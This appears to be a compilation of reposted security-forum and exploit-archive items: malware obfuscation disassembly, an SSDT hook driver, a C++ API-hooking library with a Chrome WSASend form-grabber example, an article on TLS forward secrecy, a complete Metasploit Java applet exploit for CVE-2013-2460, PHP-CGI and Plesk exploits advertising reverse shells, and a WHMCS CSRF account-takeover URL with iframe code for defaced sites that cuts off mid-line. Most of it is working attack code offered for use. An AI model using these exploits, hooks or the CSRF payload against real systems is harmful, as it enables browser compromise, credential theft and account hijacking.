The compiled binary returns this, as expected:

exampleRandom1: Code path 2!
exampleRandom2: 145
exampleHashing: 0x2D13947A
exampleHashing: 0x2D13947A
exampleEncryption: Hello world!

Decompiled code generated by the compiler:

exampleRandom1 proc near
var_18= dword ptr -18h
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+18h+var_18], offset aExamplerandom1 ; "exampleRandom1: Code path 2!"
call puts
leave
retn
exampleRandom1 endp

exampleRandom2 proc near
var_28= dword ptr -28h
var_24= dword ptr -24h
var_C= dword ptr -0Ch
push ebp
mov ebp, esp
sub esp, 28h
mov [ebp+var_C], 78
mov eax, [ebp+var_C]
mov [esp+28h+var_28], offset aExamplerandom2 ; "exampleRandom2: %d\n"
add eax, 67
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [esp+28h+var_24], eax
call printf
leave
retn
exampleRandom2 endp

exampleHashing proc near
var_18= dword ptr -18h
var_14= dword ptr -14h
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+18h+var_14], 2D13947Ah
mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n"
call printf
mov [esp+18h+var_14], 2D13947Ah
mov [esp+18h+var_18], offset aExamplehashing ; "exampleHashing: 0x%08X\n"
call printf
leave
retn
exampleHashing endp

exampleEncryption proc near
var_28= dword ptr -28h
var_24= dword ptr -24h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_12= byte ptr -12h
var_11= byte ptr -11h
var_10= byte ptr -10h
var_F= byte ptr -0Fh
var_E= byte ptr -0Eh
var_D= byte ptr -0Dh
var_C= byte ptr -0Ch
var_B= byte ptr -0Bh
var_A= byte ptr -0Ah
var_9= byte ptr -9
push ebp
xor eax, eax
mov ebp, esp
mov ecx, 0Dh
push edi
lea edi, [ebp+var_15]
sub esp, 24h
rep stosb
xor eax, eax
mov [ebp+var_15], 4Ah
mov [ebp+var_14], 66h
mov [ebp+var_13], 68h
mov [ebp+var_12], 69h
mov [ebp+var_11], 69h
mov [ebp+var_10], 27h
mov [ebp+var_F], 7Fh
mov [ebp+var_E], 66h
mov [ebp+var_D], 78h
mov [ebp+var_C], 67h
mov [ebp+var_B], 68h
mov [ebp+var_A], 2Ch

loc_401045:
lea ecx, [eax+2]
xor [ebp+eax+var_15], cl
inc eax
cmp eax, 0Ch
lea edx, [ebp+var_15]
jnz short loc_401045
mov [esp+28h+var_24], edx
mov [esp+28h+var_28], offset aExampleencrypt ; "exampleEncryption: %s\n"
mov [ebp+var_9], 0
call printf
add esp, 24h
pop edi
pop ebp
retn
exampleEncryption endp

[h=4]Attached Files[/h] main.rar 650bytes 68 downloads

Sursa: Malware related compile-time hacks with C++11 - rohitab.com - Forums
-
[h=1]My first SSDT hook driver[/h]

by zwclose7

Hello, this is my first SSDT hook driver. It hooks NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey.

NtTerminateProcess hook
This hook protects any process named calc.exe from being terminated.

NtLoadDriver hook
This hook displays the driver name in the debugger/DebugView.

NtOpenProcess hook
This hook denies access to any process named cmd.exe, returning STATUS_ACCESS_DENIED if the process name matches.

NtDeleteValueKey hook
This hook protects any value named abcdef from being deleted.

To load the driver, run loader.exe in the release folder. This program installs the driver on the system and then loads it. All functions are unhooked when the driver unloads.

[h=4]Attached Files[/h] SSDTHook.zip 287.99K 39 downloads

Sursa: My first SSDT hook driver - rohitab.com - Forums zwclose7
-
[h=1]ExtendedHook Functions c++[/h]

By RosDevil

[intro]
I decided to give away one of my master sources: a bunch of functions that are really useful for hooking APIs (or any address) on x86 machines. (I'm writing an x64 version; it will be published as soon as possible.)

ExtendedHook.h 1.46K 17 downloads
ExtendedHook.cpp 3.21K 9 downloads

[index]
This page is organized as follows:
- Function Documentation
- EHOOKSTRUCT structure
- Usage
- Compiler settings and notes to remember
- Example 1# - hooking MessageBox
- Example 2# - hooking DirectX (version 9 in this case)
- Example 3# - hooking WSASend

[Functions Documentation]
There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UninstallEHook).

//InstallEHook
bool InstallEHook(
    LPCSTR API,
    LPCTSTR lib,
    PEHOOKSTRUCT EHookA,
    void * redit
);

PARAMETERS
LPCSTR API: the name of the API
LPCTSTR lib: module name or path
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

REMARKS
This function first tries to get the module via GetModuleHandle with the given DLL name or path; if that fails, it tries LoadLibrary.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//InstallEHookEx
bool InstallEHookEx(
    void * TargetAddress,
    PEHOOKSTRUCT EHookA,
    void * redit
);

PARAMETERS
void * TargetAddress: the address of the function to hook. This function is needed especially when you want to hook a function for which you only have the address, not the definition. (See Example 2# to understand better.)
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call.
When the API is called, it will be redirected there.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//CustomEHook
bool CustomEHook(
    void * TargetAddress,
    PEHOOKSTRUCT EHookA,
    void * redit,
    unsigned int bytes_jmp
);

PARAMETERS
void * TargetAddress: the address of the function to hook. This function is needed especially when you want to hook a function for which you only have the address, not the definition. (See Example 2# to understand better.)
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT
void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there.
unsigned int bytes_jmp: the number of bytes that must be copied to perform the hook. This function is meant for the addresses of unusual APIs that may begin with a signature the functions above don't recognize; mostly you will use it when hooking an address in the middle of an API rather than at its beginning.

RETURN VALUE
If the function succeeds it returns true, otherwise false.

REMARKS
This function can easily crash if you are not careful: it does not check anything, and if the given byte count does not land on the end of an instruction, you won't be able to call the original API; if you do, it will crash.

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//UninstallEHook
void * UninstallEHook(
    PEHOOKSTRUCT EHookA
);

PARAMETER
PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT, to uninstall the hook.

RETURN VALUE
If the function succeeds it returns the original address of the API, otherwise NULL.
[EHOOKSTRUCT structure]
This structure is the core of these functions.

typedef struct _EHOOKSTRUCT{
    DWORD * adr_init;
    DWORD * adr_redirect;
    DWORD * adr_new_api;
    DWORD bytes_size;
}EHOOKSTRUCT, *PEHOOKSTRUCT;

MEMBERS
DWORD * adr_init: stores the original address
DWORD * adr_redirect: stores the address of the hook function
DWORD * adr_new_api: stores the address of the NEW API
DWORD bytes_size: number of bytes copied to perform the hook

[Usage]
This is a general summary of how to use these functions. It's easier if you look at the examples.

#include "ExtendedHook.h"

typedef -type- ( -Api Prototype- ) ( -parameters- );
EHOOKSTRUCT api_tohook;

//define a function exactly the same as the prototype
-type- Api_function_hook ( -parameters- );

-type- Api_function_hook ( -parameters- ){
    //here you can manage the parameters
    //perform the call with any parameters you want, right parameters or changed
    return ((-Api Prototype-)api_hook.adr_new_api) (- parameters -);
}

int main(){
    if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){
        printf("Error hooking");
        return 1;
    }
    return 0;
}

[Compiler settings and notes to remember]
This hooking method requires one change in the compiler settings.

- Disable intrinsic functions [VC++]
Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No]

Notes
- When you define the function prototype and its hook function, they must match the original API exactly: no changes in the parameter count. Moreover, remember to put WINAPI (__stdcall) in the definition when it is needed, otherwise it won't work.
- Some APIs are needed by nearly every other API, such as GetModuleHandle, GetProcAddress and LoadLibrary... if you hook these APIs, remember not to call any other API inside the hook function that requires them, otherwise you will end up in an infinite loop.
[Example 1# - hooking MessageBox]

#include "stdafx.h"
#include "windows.h"
#include <iostream>
#include "ExtendedHook.h"

using namespace std;

typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype
int WINAPI MessageBoxWHooker(HWND myhandle, LPCTSTR text, LPCTSTR caption, UINT types); //function hook

EHOOKSTRUCT myApi; //essential structure
pMessageBox myMessageBox = NULL; //optional, but i think it is useful

int _tmain(int argc, _TCHAR* argv[])
{
    if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){
        wcout<<"Error hooking"<<endl;
        return 1;
    }

    myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook
    myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING);

    if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) { //this will be hooked!
        wcout<<"You have pressed yes"<<endl;
    }else{
        wcout<<"You have pressed no"<<endl;
    }

    UninstallEHook(&myApi);
    cin.get();
    return 0;
}

int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){
    wcout<<"-- MessageBoxW hooked!"<<endl;
    wcout<<"HWND: "<<myhandle<<endl;
    wcout<<"Text: "<<text<<endl;
    wcout<<"Caption: "<<caption<<endl;
    wcout<<"Buttons/Icon: "<<types<<endl;
    return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types);
}

[Example 2# - hooking DirectX (version 9 in this case)]
This is a cool example: a DLL that must be injected at the very beginning of the game. If you delve into DirectX hooking you will know what I'm talking about. It has been tested on Age of Empires 3 (x86).
//AgeOfEmpireHook.dll

#include "stdafx.h"
#include "windows.h"
#include "d3dx9.h"
#include "ExtendedHook.h"

#pragma comment(lib, "d3dx9.lib")

void start_hooking();
void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height);

int times_load = 0;
typedef DWORD D3DCOLOR;
IDirect3DDevice9 * DeviceInterface;

//hook Direct3DCreate9
typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion);
EHOOKSTRUCT api_Direct3DCreate9;
IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion);

//hook CreateDevice
typedef HRESULT (APIENTRY * pCreateDevice)(
    IDirect3D9 * pDev,
    UINT Adapter,
    D3DDEVTYPE DeviceType,
    HWND hFocusWindow,
    DWORD BehaviorFlags,
    D3DPRESENT_PARAMETERS* pPresentationParameters,
    IDirect3DDevice9** ppReturnedDeviceInterface
);
EHOOKSTRUCT api_CreateDevice;
HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface);

//Hook EndScene
typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter);
EHOOKSTRUCT api_EndScene;
HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter);

BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        start_hooking();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

void start_hooking(){
    if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){
        MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING);
    }
    return;
}

IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){
    IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion);
    _asm pushad
    DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE
    if (times_load == 1){ //the first time d3d9.dll is used isn't for the game itself, we need the second
        InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook);
    }
    times_load += 1;
    _asm popad
    return pDev;
}

HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){
    HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface);
    _asm pushad
    DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE
    InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene
    _asm popad
    return final;
}

HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){
    _asm pushad
    WriteText(pDevInter, L"AGE OF EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50);
    if (GetAsyncKeyState(VK_F1))WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100);
    _asm popad
    return ((pEndScene)api_EndScene.adr_new_api)(pDevInter);
}

void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){
    ID3DXFont *m_font;
    D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font );
    D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0);
    RECT space;
    space.top = y;
    space.left = x;
    space.right = width + x;
    space.bottom = height + y;
    m_font->DrawText(NULL, text, -1, &space, 0, fontColor1);
    m_font->Release();
}

[Example 3# - hooking WSASend]
This example is again a DLL, but it doesn't need to be injected at the very beginning, since the function we are going to hook doesn't belong to any class. It has been tested on Chrome to create a FormGrabber.
//ChromeHook.dll
#include "stdafx.h"
#include "windows.h"
#include "ExtendedHook.h"

bool first = true;
void start_hooking();

//I don't want to include all of winsock.h, so let's declare what we need:
//(you can include winsock.h, it's quicker)
typedef unsigned int SOCKET;
typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE;
typedef struct __WSABUF {
    unsigned long len;
    char FAR *buf;
} WSABUF, *LPWSABUF;
typedef struct _WSAOVERLAPPED {
    ULONG_PTR Internal;
    ULONG_PTR InternalHigh;
    union {
        struct {
            DWORD Offset;
            DWORD OffsetHigh;
        };
        PVOID Pointer;
    };
    HANDLE hEvent;
} WSAOVERLAPPED, *LPWSAOVERLAPPED;

//hook WSASend
typedef int (WINAPI * pWSASend)(
    SOCKET s,
    LPWSABUF lpBuffers,
    DWORD dwBufferCount,
    LPDWORD lpNumberOfBytesSent,
    DWORD dwFlags,
    LPWSAOVERLAPPED lpOverlapped,
    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine
);
EHOOKSTRUCT api_WSASend;
int WINAPI WSASend_hook(SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine);

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        start_hooking();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

void start_hooking(){
    if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook) == false){
        MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING);
    }
}

int WINAPI WSASend_hook(SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine){
    _asm pushad
    if (first == true){ //only show the first time a call is intercepted
        MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK);
        first = false;
    }
    //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all its parameters!
    //... your code man ...
    _asm popad
    return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine);
}

Well, we're done!

PUT LIKE IF YOU APPRECIATE

I've updated my ExtendedHook.cpp; there was a little bug about the bytes to copy. [see attachment]

RosDevil

Sursa: ExtendedHook Functions c++ - rohitab.com - Forums
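The control flow the native hooks above implement - save the original entry point, run your own logic, then forward to the real API - is the same in any interposition scheme. As a language-neutral illustration (not part of RosDevil's code), here is the same save/intercept/forward pattern in Python, monkey-patching a standard-library call; the hostname logging is just a stand-in for the form-grabbing logic:

```python
import socket

calls = []

# Save the original function, the same role adr_new_api plays in EHOOKSTRUCT.
original_getaddrinfo = socket.getaddrinfo

def getaddrinfo_hook(host, *args, **kwargs):
    calls.append(host)  # our interception logic runs first...
    # ...then we forward to the saved original, exactly like the native hooks.
    return original_getaddrinfo(host, *args, **kwargs)

socket.getaddrinfo = getaddrinfo_hook        # install the hook
socket.getaddrinfo("localhost", 80)          # every caller now passes through us
socket.getaddrinfo = original_getaddrinfo    # unhook, restoring the original
print(calls)
```

The native version does the same three steps, just at the machine-code level: patch the target's entry point, run the replacement, then jump back through the saved original bytes.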
-
[h=1]A simple SSL tweak could protect you from GCHQ/NSA snooping[/h]
[h=2]It might slow you down, but hey, you can't have everything[/h]

By John Leyden, 26th June 2013

An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ.

Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials.

Several key exchange mechanisms exist, but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys.

"This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns.

This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL-encrypted traffic, given a server's private keys. This feature has become a serious liability in the era of mass surveillance.

GCHQ has been secretly tapping hundreds of fibre-optic cables to harvest data, The Guardian reported last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre-optic networks.

Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL-encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order.

The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies, but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues.

"Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything."

The Diffie-Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie-Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy.

"Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session."
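The ephemeral exchange Ristic describes can be sketched in a few lines of Python. This is a toy illustration only: the textbook parameters p = 23, g = 5 and the variable names are assumptions for demonstration, while real TLS uses 2048-bit groups (DHE) or elliptic curves (ECDHE).

```python
import secrets

# Textbook toy parameters; far too small for real use.
p, g = 23, 5

# Each party picks an ephemeral private value and publishes g^priv mod p.
a_priv = secrets.randbelow(p - 2) + 1
b_priv = secrets.randbelow(p - 2) + 1
a_pub = pow(g, a_priv, p)
b_pub = pow(g, b_priv, p)

# Both sides derive the same session secret from the peer's public value.
# Neither the server's long-term key nor the recorded transcript
# (a_pub, b_pub) is enough to recover it later.
shared_a = pow(b_pub, a_priv, p)
shared_b = pow(a_pub, b_priv, p)
assert shared_a == shared_b
```

Because the private values are thrown away after the handshake, an adversary who later obtains the server's RSA key has nothing to replay them against, which is exactly the Forward Secrecy property the article describes.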
Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial-scale snooping.

SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading many website operators to disable the feature in order to get better performance.

"In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is a bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages.

The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers, and adding DHE allows Forward Secrecy to be offered to the rest.

A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, as well as providing a good explanation of why the technology is beneficial for privacy - and noting the limitations of the technique.

"Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys."

"Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated.

"In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases.

"Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes.

Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice.

Whether sysadmins will switch to more privacy-friendly key exchange methods in spite of the performance drawbacks is by no means certain, but publicising the issue at least gives them the chance to decide for themselves. ®

Sursa: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register
Java Applet ProviderSkeleton Insecure Invoke Method
Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com

This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class, which allows calling arbitrary static methods with user-supplied arguments. The vulnerability affects Java version 7u21 and earlier.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  EXPLOIT_STRING = "Exploit"

  def initialize( info = {} )
    super( update_info( info,
      'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method',
      'Description' => %q{
        This module abuses the insecure invoke() method of the ProviderSkeleton
        class that allows to call arbitrary static methods with user supplied
        arguments. The vulnerability affects Java version 7u21 and earlier.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Adam Gowdiak',    # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser'  # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
      'Platform' => [ 'java', 'win', 'osx', 'linux' ],
      'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets' =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Jun 18 2013'
    ))
  end

  def randomize_identifier_in_jar(jar, identifier)
    identifier_str = rand_text_alpha(identifier.length)
    jar.entries.each { |entry|
      entry.name.gsub!(identifier, identifier_str)
      entry.data = entry.data.gsub(identifier, identifier_str)
    }
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
    @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
    @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("ExpProvider.class", @provider_class)
      jar.add_file("DisableSecurityManagerAction.class", @action_class)
      randomize_identifier_in_jar(jar, "metasploit")
      randomize_identifier_in_jar(jar, "payload")
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|
      <html>
      <body>
      <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
      </body>
      </html>
    |
    return html
  end
end

Sursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm
-
PHP-CGI Argument Injection
Authored by infodox

Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits.

Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz

Sursa: PHP-CGI Argument Injection ? Packet Storm
-
Plesk PHP Code Injection
Authored by Kingcope, infodox

Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features.

Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz

Sursa: Plesk PHP Code Injection ? Packet Storm
-
WHMCS Cross Site Request Forgery ########################################################################### # Exploit Title: WHMCS [CSRF] All Versions (0day) # Team: MaDLeeTs # Software Link: http://www.whmcs.com # Version: All # Site: http://www.MaDLeeTs.com # Email: LeeTHaXor@Y7Mail.com #######################Video####################################### http://vimeo.com/63686629 ########################################################################### https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768 ########################iFrame Code To Add On Deface############################## <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe> Example: <IFRAME 
